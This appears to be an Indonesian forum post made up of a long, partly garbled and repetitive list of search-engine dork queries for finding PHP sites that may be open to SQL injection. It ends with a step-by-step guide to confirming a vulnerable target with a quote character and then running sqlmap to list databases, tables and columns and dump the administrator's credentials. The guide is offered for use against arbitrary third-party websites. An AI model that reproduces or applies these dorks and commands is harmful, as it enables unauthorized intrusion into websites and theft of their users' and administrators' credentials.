inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl
roduct-item.php?id=inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl
pinions.php?id=inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl
ffer.php?idf=inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl
lay_old.php?id=inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl
.php?id=inurl
age.php?file=inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl
roduct-item.php?id=inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl
review.php?id=inurl:loadpsb.php?id=
inurl
pinions.php?id=inurl:spr.php?id=
inurl
ages.php?id=inurl:announce.php?id=
inurl:clanek.php4?id=
inurl
articipant.php?id=inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl
rod_detail.php?id=inurl:viewphoto.php?id=
inurl:article.php?id=
inurl
erson.php?id=inurl
roductinfo.php?id=inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl
rofile_view.php?id=inurl:category.php?id=
inurl
ublications.php?id=inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl
rod_info.php?id=inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl
roduct.php?id=inurl:releases.php?id=
inurl:ray.php?id=
inurl
roduit.php?id=inurl
op.php?id=inurl:shopping.php?id=
inurl
roductdetail.php?id=inurl
ost.php?id=inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl
age.php?id=inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl
roduct_ranges_view.php?ID=inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl
roduct-item.php?id=inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl
pinions.php?id=inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl
ffer.php?idf=inurl:art.php?idm=
inurl:title.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?*
*=
info.php?strona=
template.php?str=
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan
menambahkan tanda - (minus) sebelum nomor id tersebut.
Contoh :
[url]http://www.site.com/beritaLengkap.php?id=5''[/url]
[url]http://www.site.com/beritaLengkap.php?id=’5[/url]
http://www.site.com/beritaLengkap.php?id=-5
Jika Target Vuln AKan Muncul Tulisan
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 7"
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian untuk mencari nama database, ketikkan “ ./sqlmap.py -u http:/www.dite.com/contoh.php?id=5 --dbs” (tanpa tanda petik) kemudian Enter.
Setelah kita mendapatkan Database , kita tulis “./sqlmap.py -u http://www.site.com/contoh.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.
Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.ssite.com/contoh.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.site.com/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.
Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut
Tinggal Cari Admin Loginya deh
0
20K
7
Komentar yang asik ya
Urutan
Terbaru
Terlama
Komentar yang asik ya
Komunitas Pilihan